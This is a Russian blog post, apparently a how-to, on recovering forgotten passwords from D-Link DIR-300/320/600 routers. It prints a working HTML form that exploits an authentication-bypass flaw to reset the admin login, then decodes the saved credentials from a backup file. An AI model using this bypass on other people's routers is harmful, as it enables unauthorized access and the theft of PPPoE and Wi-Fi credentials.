пятница, 15 января 2016 г.

D-Link DIR-300/DIR-320/DIR-600. Восстановление забытого пароля.

Представим себе, что вы попали в ситуацию, когда вам надо зайти в web-интерфейс вашего D-Link DIR-320, а пароль администратора вы не помните. Или возьмем более общую ситуацию, когда вам нужно помочь кому-нибудь настроить новый роутер, вместо старого DIR-320, однако, обратившийся за помощью к вам владелец не помнит абсолютно ничего. Т.е. ни пароля для входа в web-интерфейс, ни пароля для PPPoE соединения, ни пароля для WiFi. Очевидный путь в данной ситуации - это просто отложить DIR-320 в сторону, дозвониться до тех. поддержки провайдера, "сбросить" пароль PPPoE и настроить новый роутер. Однако, есть способ проще, который позволяет достать всю необходимую информацию, непосредственно из имеющегося роутера.

Рассматривать сложные варианты, с созданием PPPoE концентратора на Mikrotik'е для того, чтобы узнать пароль к PPPoE мы не будем. Хотя такой подход тоже имеет место. Вместо этого мы воспользуемся exploit'ом D-Link DIR-300 Multiple Security Bypass Vulnerabilities для получения доступа к нашему роутеру.

Создадим в блокноте файл login.html со следующим содержанием:

<form action="http://192.168.0.1:80/tools_admin.php" method="POST">
<input type="hidden" name="ACTION_POST" value="LOGIN">
<input type="hidden" name="LOGIN_USER" value="a">
<input type="hidden" name="LOGIN_PASSWD" value="b">
<input type="hidden" name="login" value="+Log+In+">
<input type="hidden" name="NO_NEED_AUTH" value="1">
<input type="hidden" name="AUTH_GROUP" value="0">
<input type="hidden" name="admin_name" value="admin">
<input type="hidden" name="admin_password1" value="admin">
<input type="submit">
</form>

И откроем его в браузере. После нажатия кнопки "Отправить", несмотря на появившееся сообщение об ошибке логин и пароль для входа в web-интерфейс будут сброшены на стандартные admin / admin, Так, мы получили доступ к web-интерфейсу. Однако, посмотреть сохраненные в роутере пароли таким образом у нас все равно не получится.

Для того чтобы сделать это, заходим в меню System и выбираем там опцию backup'а настроек устройства на жесткий диск. В результате у нас получается файл config.bin, который как раз и содержит все необходимые нам логины, пароли и явки. Однако, содержимое данного файла в бинарном формате, плюс сжато / зашифровано. Для просмотра содержимого полей логин / пароль в открытом виде нам понадобится утилита RouterPassView v1.62 от Nir Sofer'а. Утилита также поддерживает формат файлов конфигурации от множества других устройств. Открываем полученный config.bin в RoutePassView и видим все необходимое:


Теперь, обладая нужными данными можно приступать к настройке нового роутера. Согласитесь, данный способ куда быстрее, чем связь с ТП провайдера для изменения паролей доступа в интернет. Также, его преимущество в том, что вы также получаете пароль от WiFi и можете настроить беспроводную сеть в новом роутере с теми же учетными данными, чтобы все клиентские устройства, которые уже были настроены на беспроводную сеть старого роутера без каких-либо дополнительных настроек начали соединяться с вновь настроенным роутером.

3 комментария :

  1. неделю софт для открытия config.bin искал)))

    ОтветитьУдалить
  2. А я пару дней искал. Не знаю почему не гуглится ваша статья на первом месте. Но находил только тысяч вопросов как выдрать пароль и ни одного дейтсвенного метода. Большое спасибо!

    ОтветитьУдалить
    Ответы
    1. Рад, что статья вам помогла. А поисковикам вполне можно помочь с релевантностью ответов. Вы можете разместить несколько упоминаний о методе описанном в статье со ссылкой на нее на паре-тройке тематических ресурсов.

      Удалить